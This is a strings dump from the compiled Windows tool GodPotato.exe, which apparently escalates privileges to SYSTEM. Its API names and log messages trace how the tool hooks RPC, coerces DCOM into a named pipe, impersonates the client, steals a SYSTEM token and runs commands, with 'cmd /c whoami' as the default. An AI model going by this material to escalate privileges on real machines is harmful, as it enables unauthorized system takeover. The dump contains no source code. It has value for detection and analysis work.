!This program cannot be run in DOS mode.
`.rsrc
@.reloc
MEOW.
MEOWo
v2.0.50727
#Strings
t%j%T%G%:%
%`%-%
delegateFun10
<>c__DisplayClass42_0
<PipeServer>b__0
delegateFun11
List`1
Reserved1
delegateFun12
advapi32
Kernel32
kernel32
ReadUInt32
ReadInt32
WriteInt32
Dictionary`2
cbReserved2
lpReserved2
delegateFun13
Reserved3
delegateFun14
ReadUInt64
WriteInt64
ToInt64
EPM_PROTOCOL_OSI_TP4
Reserved4
delegateFun4
Reserved5
delegateFun5
ReadUInt16
ReadInt16
WriteInt16
Reserved6
delegateFun6
Reserved7
delegateFun7
Reserved8
delegateFun8
delegateFun9
<Module>
SECURITY_LOGON_SESSION_DATA
EPM_PROTOCOL_SMB
CREATE_BREAKAWAY_FROM_JOB
EPM_PROTOCOL_VINES_IPC
EPM_PROTOCOL_NCALRPC
NewOrcbRPC
newOrcbRPC
HookRPC
GENERIC_READ
STGM_READ
STGM_SHARE_DENY_READ
CREATE_SUSPENDED
SE_PRIVILEGE_ENABLED
STANDARD_RIGHTS_REQUIRED
SE_PRIVILEGE_REMOVED
MAXIMUM_ALLOWED
TOKEN_ADJUST_SESSIONID
STARTF_TITLEISAPPID
get_SID
set_SID
SyntaxGUID
EPM_PROTOCOL_UUID
TowerID
towerID
ProcessID
PROCESS_MODE_BACKGROUND_END
PIPE_ACCESS_INBOUND
PIPE_ACCESS_OUTBOUND
E_NOINTERFACE
RPC_SERVER_INTERFACE
STARTF_UNTRUSTEDSOURCE
TOKEN_QUERY_SOURCE
CREATE_DEFAULT_ERROR_MODE
PIPE_READMODE_MESSAGE
PIPE_TYPE_MESSAGE
RPC_DISPATCH_TABLE
PHANDLE
BAD_HANLE
CREATE_NEW_CONSOLE
STARTF_TITLEISLINKNAME
STGM_SHARE_DENY_NONE
EPM_PROTOCOL_NAMED_PIPE
TOKEN_TYPE
SECURITY_LOGON_TYPE
TOKEN_ELEVATION_TYPE
STGM_FAILIFTHERE
HANDLE_FLAG_PROTECT_FROM_CLOSE
TOKEN_DUPLICATE
STGM_CREATE
TOKEN_IMPERSONATE
STGM_READWRITE
GENERIC_WRITE
STGM_WRITE
STGM_SHARE_DENY_WRITE
STARTF_USEFILLATTRIBUTE
GENERIC_EXECUTE
PIPE_READMODE_BYTE
PIPE_TYPE_BYTE
STGM_SHARE_EXCLUSIVE
STARTF_USESIZE
EPM_PROTOCOL_NCADG
STARTF_PREVENTPINNING
GENERIC_MAPPING
UNICODE_STRING
STATSTG
STATUS_INFO_LENGTH_MISMATCH
GodPotato.NativeAPI
EPM_PROTOCOL_NETBEUI
STARTF_FORCEOFFFEEDBACK
STARTF_FORCEONFEEDBACK
EPM_PROTOCOL_APPLETALK
EPM_PROTOCOL_STREETTALK
TOKEN_MANDATORY_LABEL
PROFILE_KERNEL
CREATE_PRESERVE_CODE_AUTHZ_LEVEL
GENERIC_ALL
EPM_PROTOCOL_NULL
ProcessUserModeIOPL
CREATE_SHARED_WOW_VDM
CREATE_SEPARATE_WOW_VDM
UnmarshalDCOM
EPM_PROTOCOL_NCACN
STARTF_RUNFULLSCREEN
PROCESS_ACCESS_TOKEN
PROCESS_MODE_BACKGROUND_BEGIN
RPC_VERSION
OBJECT_TYPE_INFORMATION
PROCESS_INFORMATION
TOKEN_ELEVATION
STARTF_USEPOSITION
STARTUPINFO
MIDL_SERVER_INFO
System.IO
EPM_PROTOCOL_TCP
EPM_PROTOCOL_DDP
EPM_PROTOCOL_UDP
EPM_PROTOCOL_IP
EPM_PROTOCOL_VINES_SPP
EPM_PROTOCOL_DSP
EPM_PROTOCOL_DNET_NSP
EPM_PROTOCOL_HTTP
CREATE_NEW_PROCESS_GROUP
TOKEN_ALL_ACCESS_P
RPC_SYNTAX_IDENTIFIER
PROFILE_USER
NMPWAIT_WAIT_FOREVER
PROFILE_SERVER
NOERROR
IIDPTR
TOKEN_STATISTICS
EPM_PROTOCOL_UNIX_DS
PIPE_UNLIMITED_INSTANCES
TOKEN_ADJUST_PRIVILEGES
STARTF_USESTDHANDLES
SID_AND_ATTRIBUTES
SECURITY_ATTRIBUTES
EPM_PROTOCOL_OSI_CLNS
CREATE_FORCEDOS
EPM_PROTOCOL_NETBIOS
TOKEN_GROUPS
TOKEN_ADJUST_GROUPS
STARTF_USECOUNTCHARS
TOKEN_INFORMATION_CLASS
PROCESS_INFORMATION_CLASS
OBJECT_INFORMATION_CLASS
IDLE_PRIORITY_CLASS
REALTIME_PRIORITY_CLASS
HIGH_PRIORITY_CLASS
ABOVE_NORMAL_PRIORITY_CLASS
BELOW_NORMAL_PRIORITY_CLASS
DUPLICATE_SAME_ACCESS
ERROR_SUCCESS
STATUS_SUCCESS
DETACHED_PROCESS
CREATE_PROTECTED_PROCESS
DEBUG_PROCESS
DEBUG_ONLY_THIS_PROCESS
PIPE_REJECT_REMOTE_CLIENTS
PIPE_ACCEPT_REMOTE_CLIENTS
ALPHA_BET
PIPE_NOWAIT
NMPWAIT_NOWAIT
PIPE_WAIT
NMPWAIT_USE_DEFAULT_WAIT
HANDLE_FLAG_INHERIT
CREATE_IGNORE_SYSTEM_DEFAULT
TOKEN_ADJUST_DEFAULT
SE_PRIVILEGE_ENABLED_BY_DEFAULT
CREATE_UNICODE_ENVIRONMENT
EXTENDED_STARTUPINFO_PRESENT
STGM_CONVERT
STARTF_USESHOWWINDOW
CREATE_NO_WINDOW
STATUS_BUFFER_OVERFLOW
CreateFileW
CreateNamedPipeW
CreateProcessWithTokenW
CreateProcessAsUserW
CreateProcessW
PIPE_ACCESS_DUPLEX
_SYSTEM_HANDLE_INFORMATION_EX
SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX
EPM_PROTOCOL_NB_IPX
EPM_PROTOCOL_IPX
EPM_PROTOCOL_SPX
STARTF_USEHOTKEY
TOKEN_ASSIGN_PRIMARY
TOKEN_QUERY
INHERIT_PARENT_AFFINITY
INHERIT_CALLER_PRIORITY
value__
ppLogonSessionData
LsaGetLogonSessionData
SetQuota
mscorlib
System.Collections.Generic
authzSnc
pStubDesc
AuthnSvc
authnSvc
AuthzSvc
get_Id
dwThreadId
ModifiedId
InterfaceId
TokenId
LogonId
sourceSessionId
WTSGetActiveConsoleSessionId
TokenSessionId
targetSessionId
sessionId
AuthenticationId
get_TargetProcessId
set_TargetProcessId
dwProcessId
processId
pcbRead
GenericRead
bytesRead
VirtualMemoryRead
CreateThread
hThread
pipeServerThread
DynamicCharged
TokenVirtualizationEnabled
overlapped
get_Required
set_Required
IsTokenRestricted
get_IsRestricted
set_IsRestricted
TokenIsRestricted
TokenElevationTypeLimited
Untrusted
lpReserved
reserved
TokenVirtualizationAllowed
TokenIsSandboxed
targetProcessPid
targetPid
TokenLogonSid
TokenAppContainerSid
orcbRPCGuid
NewGuid
lpLuid
<SID>k__BackingField
<TargetProcessId>k__BackingField
<Required>k__BackingField
<IsRestricted>k__BackingField
<cmd>k__BackingField
<TokenHandle>k__BackingField
<CombaseModule>k__BackingField
<FieldName>k__BackingField
<PipeName>k__BackingField
<UserName>k__BackingField
<TokenType>k__BackingField
<LogonType>k__BackingField
<AuthenticationType>k__BackingField
<TokenElevationType>k__BackingField
<IsClose>k__BackingField
<DefaultValue>k__BackingField
<TargetProcessExePath>k__BackingField
<IsHook>k__BackingField
<ImpersonationLevel>k__BackingField
<IntegrityLevel>k__BackingField
<TargetProcessToken>k__BackingField
<LogonDomain>k__BackingField
<Session>k__BackingField
<Description>k__BackingField
<ConsoleWriter>k__BackingField
<DispatchTablePtr>k__BackingField
<UseProtseqFunctionPtr>k__BackingField
<Groups>k__BackingField
<TokenUIAccess>k__BackingField
<UseProtseqFunctionParamCount>k__BackingField
<IsStart>k__BackingField
get_cmd
set_cmd
set_IsBackground
NativeMethod
GetMethod
method
Standard
password
CoUnmarshalInterface
Replace
TokenPrivateNameSpace
Service
CreateInstance
TokenSessionReference
IdentityReference
ComputeOccurence
TokenSource
dwErrCode
FileMode
pipeMode
dwShareMode
openMode
ProcessDefaultHardErrorMode
get_Unicode
AuthenticationPackage
NonPagedPoolUsage
get_Message
BytesLeftThisMessage
EndInvoke
BeginInvoke
DispatchTable
dispatchTable
ThunkTable
fmtStringOffsetTable
DynamicAvailable
IDisposable
hSourceHandle
moduleHandle
RuntimeTypeHandle
CloseHandle
DuplicateHandle
ListSystemHandle
GetTypeFromHandle
get_TokenHandle
set_TokenHandle
tokenHandle
hSourceProcessHandle
hTargetProcessHandle
targetProcessHandle
processHandle
lpTargetHandle
bInheritHandle
handle
hTemplateFile
tokenHanle
Console
lpTitle
get_CombaseModule
set_CombaseModule
ProcessModule
get_Name
get_FieldName
set_FieldName
lpFileName
get_ModuleName
get_PipeName
set_PipeName
pipeName
baseName
PrincipalName
principalName
lpSystemName
lpApplicationName
lpName
appName
get_UserName
set_UserName
privName
GetDisplayName
LogonTime
ExpirationTime
lpCommandLine
commandLine
WriteLine
hReadPipe
CreateNamedPipe
hNamedPipe
PeekNamedPipe
ConnectNamedPipe
CreatePipe
hWritePipe
GetNestedType
ValueType
dwLockType
PoolType
get_TokenType
set_TokenType
GetTokenType
getTokenType
tokenType
get_LogonType
set_LogonType
UndefinedLogonType
logonType
get_AuthenticationType
set_AuthenticationType
GetAuthenticationType
get_TokenElevationType
set_TokenElevationType
GetTokenElevationType
ObjectType
GetElementType
get_PropertyType
FileShare
Restore
Signature
PtrToStructure
MethodBase
ReadOnlyCollectionBase
MaintainHandleDatabase
get_IsClose
set_IsClose
Dispose
ArgsParse
CreateDelegate
useProtseqDelegate
GetFunctionPointerForDelegate
MulticastDelegate
Translate
Terminate
PreviousState
NewState
GenericWrite
VirtualMemoryWrite
CompilerGeneratedAttribute
GuidAttribute
AttributeUsageAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
dwFillAttribute
GetCustomAttribute
AssemblyFileVersionAttribute
SecurityPermissionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
FlagsAttribute
ArgsAttribute
CompilationRelaxationsAttribute
ReliabilityContractAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
GenericExecute
ReadByte
WriteByte
get_Value
LookupPrivilegeValue
HandleValue
TryGetValue
ParseArgsSetValue
get_DefaultValue
set_DefaultValue
get_IsAlive
CachedInteractive
CachedRemoteInteractive
get_IsPrimitive
dlibMove
Remove
GodPotato.exe
dwXSize
dwYSize
get_Size
cbSize
TypeSize
inBufferSize
outBufferSize
SecurityDescriptorSize
ProcessLdtSize
SetSize
get_ModuleMemorySize
Initialize
Synchronize
SizeOf
StandardObjRef
standardObjRef
objref
RevertToSelf
System.Threading
StringBinding
stringBinding
SecurityBinding
securityBinding
binding
Encoding
GenericMapping
FromBase64String
ProcString
procString
ToString
Substring
statStg
Search
ProcessWorkingSetWatch
get_TargetProcessExePath
set_TargetProcessExePath
get_Length
MaximumLength
SystemInformationLength
TokenInformationLength
ProcessInformationLength
ObjectInformationLength
ReturnLength
BufferLength
dwLength
StartsWith
PtrToStringUni
StringToHGlobalUni
AsyncCallback
ListProcessTokensCallback
listProcessTokensCallback
ListProcessTokensDefaultCallback
callback
pBlock
CachedUnlock
get_IsHook
set_IsHook
Network
dwMask
ProcessAffinityMask
AllocHGlobal
FreeHGlobal
Marshal
DuplicateTokenExInternal
System.Security.Principal
TokenDefaultDacl
System.ComponentModel
get_ImpersonationLevel
set_ImpersonationLevel
TokenImpersonationLevel
GetImpersonationLevel
impersonationLevel
TokenProcessTrustLevel
get_IntegrityLevel
set_IntegrityLevel
GetTokenIntegrityLevel
bytesAvail
GenericAll
ole32.dll
wtsapi32.dll
Advapi32.dll
advapi32.dll
kernel32.dll
secur32.dll
psapi.dll
ntdll.dll
TokenElevationTypeFull
TowerProtocol
towerProtocol
IStreamImpl
IStream
FileStream
get_BaseStream
MemoryStream
m_stream
Program
get_Item
set_Item
System
Custom
get_IsEnum
Boolean
get_Token
TokenLinkedToken
hExistingToken
hToken
isFindSystemToken
SharpToken
ProcessAccessToken
OpenProcessToken
get_TargetProcessToken
set_TargetProcessToken
targetProcessToken
processToken
GetToken
PutToken
ContextToken
phNewToken
pcbWritten
get_LogonDomain
set_LogonDomain
logonDomain
SeekOrigin
TokenOrigin
dwOrigin
LockRegion
UnlockRegion
StringSDRevision
MajorVersion
MinorVersion
SyntaxVersion
get_Session
set_Session
WTSConnectSession
TokenBnoIsolation
ProcessWx86Information
ProcessBasicInformation
ObjectBasicInformation
QueryLimitedInformation
SystemExtendedHandleInformation
ObjectHandleInformation
SetHandleInformation
ObjectNameInformation
ObjectTypeInformation
NtQuerySystemInformation
GetTokenInformation
ObjectAllTypesInformation
TokenAccessInformation
lpProcessInformation
processInformation
ObjectInformation
ProcessLdtInformation
SetInformation
QueryInformation
TokenImpersonation
VirtualMemoryOperation
TokenElevation
SecurityAction
System.Reflection
ProcessModuleCollection
get_Position
plibNewPosition
dwCreationDisposition
Win32Exception
InvalidDataException
NotImplementedException
get_InnerException
ArgumentException
get_Description
set_Description
System.Runtime.ConstrainedExecution
pattern
UnKnown
IID_IUnknown
pIUnknown
CopyTo
MethodInfo
lpStartupInfo
MemberInfo
InterpreterInfo
ConstructorInfo
pSyntaxInfo
PropertyInfo
propertyInfo
startupinfo
GodPotato
PrintHelp
lpDesktop
TokenPrimaryGroup
ProcessEnableAlignmentFaultFixup
ReadChar
TokenAppContainerNumber
BinaryReader
StringBuilder
LsaFreeReturnBuffer
buffer
GodPotatoUnmarshalTrigger
SecurityIdentifier
IMoniker
CreateObjrefMoniker
ppMoniker
moniker
Handler
TokenIsLessPrivilegedAppContainer
TokenIsAppContainer
TokenOwner
ImpersonateLoggedOnUser
TokenUser
GetUser
get_ConsoleWriter
set_ConsoleWriter
consoleWriter
StringWriter
TextWriter
BinaryWriter
ObjectPointer
PipeServer
ToLower
GetLastWin32Error
hStdError
SetLastError
IEnumerator
GetEnumerator
.cctor
GetConstructor
StringSecurityDescriptor
ConvertStringSecurityDescriptorToSecurityDescriptor
pSecurityDescriptor
get_DispatchTablePtr
set_DispatchTablePtr
get_UseProtseqFunctionPtr
set_UseProtseqFunctionPtr
StructureToPtr
handleInfoPtr
ReadIntPtr
WriteIntPtr
TokenStatistics
System.Diagnostics
TokenRestrictedSids
NativeMethods
System.Runtime.InteropServices
System.Runtime.CompilerServices
maxInstances
DebuggingModes
TokenGroupsAndPrivileges
DisableAllPrivileges
AdjustTokenPrivileges
NumEntries
TokenCapabilities
GetProperties
GetNumberOfHandles
bInheritHandles
examples
get_Modules
ProcessTimes
System.Runtime.InteropServices.ComTypes
lpThreadAttributes
InvalidAttributes
dwFlagsAndAttributes
HandleAttributes
lpPipeAttributes
TokenRestrictedDeviceClaimAttributes
TokenDeviceClaimAttributes
TokenRestrictedUserClaimAttributes
TokenUserClaimAttributes
lpTokenAttributes
TokenSingletonAttributes
lpProcessAttributes
TokenSecurityAttributes
securityAttributes
ReadBytes
objRefBytes
GetBytes
GetValues
PublicRefs
publicRefs
ProcessCreateFlags
grfFlags
BindingFlags
dwLogonFlags
dwCreationFlags
ProcessAccessFlags
TokenChildProcessFlags
grfCommitFlags
dwFlags
ppdsaNewBindings
ParseArgs
GodPotatoArgs
<>4__this
NewCredentials
TokenuUils
ListProcessTokens
Contains
System.Security.Permissions
System.Collections
TokenHasRestrictions
dwOptions
getGoups
get_Groups
set_Groups
TokenRestrictedDeviceGroups
TokenDeviceGroups
TokenGroups
get_Chars
GetChars
dwXCountChars
dwYCountChars
ProcessIoPortHandlers
ProcessVmCounters
ProcessIoCounters
secAttrs
SystemInformationClass
TokenInformationClass
tokenInformationClass
ProcessInformationClass
ObjectInformationClass
MaxTokenInfoClass
MaxProcessInfoClass
ProcessPriorityClass
get_TokenUIAccess
set_TokenUIAccess
GetTokenUIAccess
dwDesiredAccess
GrantedAccess
ValidAccess
FileAccess
processAccess
ProtectedProcess
NtSuspendProcess
NtResumeProcess
CreateProcess
NtTerminateProcess
hProcess
OpenProcess
NtSetInformationProcess
GetCurrentProcess
get_BaseAddress
NetworkAddress
networkAddress
AttributeTargets
ProcessQuotaLimits
ProcessPooledUsageAndLimits
ExitStatus
HandleAt
Concat
Format
fakeObject
NtDuplicateObject
hObject
UnmarshalObject
ToObject
GetIUnknownForObject
NtQueryObject
object
oldProtect
VirtualProtect
newProtect
libOffset
FmtStringOffset
SecurityOffset
Commit
get_Default
TokenElevationTypeDefault
IAsyncResult
result
ImpersonateNamedPipeClient
lpEnvironment
Component
get_Current
GetCurrent
RpcProtseqEndpoint
get_Count
PrivilegeCount
DispatchTableCount
PeakHandleCount
ProcessHandleCount
get_UseProtseqFunctionParamCount
set_UseProtseqFunctionParamCount
nCount
GroupCount
PeakObjectCount
RpcProtseqEndpointCount
GetSidSubAuthorityCount
NTAccount
Interrupt
HighPart
LowPart
ThreadStart
get_IsStart
set_IsStart
TokenSandBoxInert
Revert
Convert
ProcessDebugPort
ProcessExceptionPort
ProcessPriorityBoost
get_Out
createProcessReadOut
defaultTimeout
hStdInput
hStdOutput
MoveNext
System.Text
GodPotatoContext
godPotatoContext
InitContext
NetworkCleartext
tryAddTokenPriv
DefaultManagerEpv
wShowWindow
GetModuleFileNameEx
RevertToSelfEx
DuplicateTokenEx
pTransferSyntax
CreatorBackTrackIndex
IBindCtx
CreateBindCtx
bindCtx
Sunday
ToByteArray
DualStringArray
dualStringArray
ToArray
get_IsArray
TokenAuditPolicy
TokenMandatoryPolicy
Consistency
TokenPrimary
lpCurrentDirectory
get_Capacity
op_Equality
op_Inequality
MediumHighIntegrity
SystemIntegrity
MediumIntegrity
LowIntegrity
GetSidSubAuthority
nSubAuthority
ProcessBasePriority
ProcessRaisePriority
ppdsaNewSecurity
systemIdentity
WindowsIdentity
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
WrapNonExceptionThrows
GodPotato
Copyright
2022
$2ae886c3-3272-40be-8d3c-ebaede9e61e1
1.0.0.0
Inherited
AllowMultiple
cmd /c whoami
Description
CommandLineT
Required
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
+ , -!.!/!0!1!2!3!4!5!6!7!8%9%:%;%<%=%>'?'@'A'B'
UnKnown
[*] process start with pid {0}
[!] Cannot create process Win32Error:{0}
Required Parameter
Arguments:
-{0} Required:{1} {2} (default {3})
Example:
-{0} "{1}"
-{0} {1}
FFFFF FFF FFFFFFF
FFFFFFF FFF FFFFFFFF
FFF FFFF FFF FFF FFF FFF FFF
FFF FFF FFF FFF FFF FFF FFF
FFF FFF FFF FFF FFF FFF FFF
FFFF FFFFFFF FFFFFFFF FFF FFF FFFFFFF FFFFFFFFF FFFFFF FFFFFFFFF FFFFFF
FFFF FFFF FFFF FFF FFFF FFF FFFF FFFF FFFF FFF FFF FFF FFF FFF FFFF
FFFF FFFFF FFF FFF FFF FFF FFFFFFFF FFF FFF FFF F FFF FFF FFF FFF
FFFF FFF FFF FFFFFFF FFF FFF FFFF FFF FFF FFFFF FFF FFF FFFF
FFFF FFF FFF FFFFFFF FFF FFF FFFF FFF FFF FFFFFFFF FFF FFF FFFF
FFF FFF FFF FFF FFF FFF FFF FFF FFF FFF FFFF FFF FFF FFF FFFF
FFFF FFFF FFFF FFF FFFF FFF FFF FFF FFFF FFF FFFF FFF FFF FFFF FFF
FFFFFFFF FFFFFFF FFFFFFFF FFF FFFFFFF FFFFFF FFFFFFFF FFFFFFF FFFFFFF
FFFFFFF FFFFF FFFFFFF FFF FFFFF FFFFF FFFFFFFF FFFF FFFF
GodPotato
Exception:
[*] CombaseModule: 0x{0:x}
[*] DispatchTable: 0x{0:x}
[*] UseProtseqFunction: 0x{0:x}
[*] UseProtseqFunctionParamCount: {0}
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] UnmarshalObject: 0x{0:x}
[*] CurrentUser:
[!] Failed to impersonate security context token
No combase module found
Cannot find IDL structure
delegateFun
combase.dll
D:(A;OICI;GA;;;WD)
\\.\pipe\
\pipe\epmapper
[*] CreateNamedPipe
[*] Pipe Connected!
[*] CurrentsImpersonationLevel:
[*] Start Search System Token
[*] Find System Token :
[!] ImpersonateNamedPipeClient fail error:{0}
[!] ConnectNamedPipe timeout
[!] CreateNamedPipe fail error:{0}
IsHook == false
IsStart == false
18f70770-8e64-11cf-9af1-0020af6e72f4
ncacn_np:localhost/pipe/
[\pipe\epmapper]
ncacn_ip_tcp:fuck you !
GodPotatoContext was not initialized
objref:
[*] DCOM obj GUID: {0}
[*] DCOM obj IPID: {0}
[*] DCOM obj OXID: 0x{0:x}
[*] DCOM obj OID: 0x{0:x}
[*] DCOM obj Flags: 0x{0:x}
[*] DCOM obj PublicRefs: 0x{0:x}
[*] Marshal Object bytes len: {0}
[*] UnMarshal Object
{00000000-0000-0000-C000-000000000046}
127.0.0.1
Does not look like an OBJREF stream
NT AUTHORITY\SYSTEM
[*] PID : {0} Token:0x{1:x} User: {2} ImpersonationLevel: {3}
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
GodPotato
FileVersion
1.0.0.0
InternalName
GodPotato.exe
LegalCopyright
Copyright
2022
LegalTrademarks
OriginalFilename
GodPotato.exe
ProductName
GodPotato
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0